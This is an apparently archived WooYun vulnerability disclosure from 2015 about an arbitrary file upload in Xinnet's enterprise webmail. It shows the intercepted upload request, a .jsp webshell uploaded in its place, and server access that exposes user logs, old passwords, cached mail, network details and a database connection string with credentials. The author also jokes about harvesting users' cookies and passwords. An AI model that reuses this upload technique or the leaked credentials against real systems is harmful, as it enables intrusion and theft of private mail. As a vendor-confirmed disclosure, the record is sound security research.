当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121037

漏洞标题:新网企业邮箱服务可以shell影响(从任意用户域可拿新网服务器shell)

相关厂商:新网华通信息技术有限公司

漏洞作者: 鸟云厂商

提交时间:2015-06-17 11:42

修复时间:2015-08-01 13:14

公开时间:2015-08-01 13:14

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-27: 细节向核心白帽子及相关领域专家公开
2015-07-07: 细节向普通白帽子公开
2015-07-17: 细节向实习白帽子公开
2015-08-01: 细节向公众公开

简要描述:

我只想说,新网我们到底还能不能好好做朋友了?

详细说明:

新网企业邮箱服务
http://www.xinnet.com/mail/mail.html
该服务可以购买,一年也就几百块钱。
大量企业在用,包括新网自己家
由于已经有了一个管理员账号,所以不用再去购买了。
我们直接测试
http://webmail.xinnet.asia/(可以是任意一个新网企业邮箱)
以管理员账户登录
企业信息设置---企业信纸

65BE6A0B-F4A8-4CAE-BA11-4D3B86ADA34B.png


添加新信纸---上传图片

50E300DA-A627-43AC-83A8-DC6BD7D1B28A.png


抓包

CBF64B59-E57B-4C11-8CD0-A8B69F5CB970.png


POST /app/eadmin/uploadStationeryPic HTTP/1.1
Host: webmail.xinnet.asia
Proxy-Connection: keep-alive
Content-Length: 6837
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webmail.xinnet.asia
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu48IEN2y86aEeP0U
DNT: 1
Referer: http://webmail.xinnet.asia/app/eadmin/qyxz
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: LASTLOGINACCOUNT=x********a; zmail300_language=CN; JSESSIONID=7*******8E51
------WebKitFormBoundaryu48IEN2y86aEeP0U
Content-Disposition: form-data; name="inputfile"; filename="wooyun1.jpg"
Content-Type: image/jpeg


filename修改为wooyun.jsp
返回数据,得到路径

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 16 Jun 2015 16:45:01 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Length: 129
{"imgsrc":"/usr/zweb/forspringwork/zweb/template/stationery/img/00/xinnet.asia/temp/2015_6_17_1198739863.jsp","status":"success"}


菜刀连接之

ED2B1F58-81F5-469E-85C6-C0699CEAD0AD.png


此处ip不恒定,貌似是负载还是啥的
查看用户的邮件发送记录(随机新网企业邮箱用户)

/var/umail/javaapps/zmail4.0/logs/sendMail.log


487DB7A2-8C63-4643-A2B9-3C9A1AC5BE02.png


查看企业邮箱管理员操作记录(随机新网企业邮箱管理员)

/var/umail/javaapps/zmail4.0/logs/adminAccess.log


7A91E5C2-750F-4B18-AA0C-A95EB3D0CB79.png


查看登录记录(随机新网企业邮箱用户)

/var/umail/javaapps/zmail4.0/logs/webmail.log


D79FF5E7-772C-402F-9207-395AB570F838.png


查看用户修改密码行为,不断更新,并且可以看到旧密码

/var/umail/logs/mailgateway_operation.log


B7773C96-A333-4D1A-A155-8554A503A8FF.png


查看用户发送的邮件内容

/var/umail/storage/cache/20150617


cache文件夹会有每天的邮件缓存,可以分时、分域名查看用户邮件
<img src="/upload/201506/17021440e4a3d6842javascript:void(0)a3af2b2a4a94c5eef7978be.png" alt="B492B835-CD76-441C-BA24-466B4070509A.png" />
可以修改不同企业邮箱登录口源码,可以改个代码什么的,密码往我这里发一份:)
直接改企业邮箱主代码,任意用户登录后我都可以收到cookie。
这里还是不演示为好= =

/var/umail/javaapps/usr/usr/zweb/loginCustom/


5EF2D6D3-2D3C-45B3-B4BF-DD18CEC2E605.png


host配置,邮件服务器

[/var/umail/javaapps/zmail4.0/]$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1    web1 localhost
::1		localhost6.localdomain6 localhost6
121.14.68.78   pop.xinnetdns.com


网卡信息,在内网

[/var/umail/javaapps/zmail4.0/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1B:78:99:24:3A  
          inet addr:121.**.*.76  Bcast:121.14.3.95  Mask:255.255.255.224
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3640668075 errors:0 dropped:92535 overruns:0 frame:0
          TX packets:4068494914 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1433004161193 (1.3 TiB)  TX bytes:3637010612570 (3.3 TiB)
          Interrupt:169 Memory:f8000000-f8012800 
eth1      Link encap:Ethernet  HWaddr 00:1B:78:99:24:38  
          inet addr:10.2.**.12  Bcast:10.2.50.63  Mask:255.255.255.192
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7687231891 errors:4 dropped:3669985 overruns:0 frame:4
          TX packets:8463979669 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5663583198250 (5.1 TiB)  TX bytes:7495389851878 (6.8 TiB)
          Interrupt:177 Memory:fa000000-fa012800 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1555579120 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1555579120 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:3159991245155 (2.8 TiB)  TX bytes:3159991245155 (2.8 TiB)
lo:0      Link encap:Local Loopback  
          inet addr:202.**.**.9  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
lo:1      Link encap:Local Loopback  
          inet addr:123.**.**.9  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
lo:2      Link encap:Local Loopback  
          inet addr:202.**.**.14  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
lo:3      Link encap:Local Loopback  
          inet addr:122.13.221.71  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1


找到了数据库配置文件

<T>XDB</T>
<X>
com.mysql.jdbc.Driver
jdbc:mysql://10.2.50.60:3306/mail_account?user=umail&password=umail_password
</X>


分库太多了,几千个。具体多少用户无法估算,mysql当前用户有些语句执行不了
给个示例,随便个用户id都到80000级别了,并且能返回密码md5

8061EABF-1B07-46C4-A547-F18741A2834F.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-17 13:13

厂商回复:

非常感谢鸟云厂商@乌云,小新正在玩命确认及修复中

最新状态:

2015-06-18:漏洞已修复,非常感谢鸟云厂商@乌云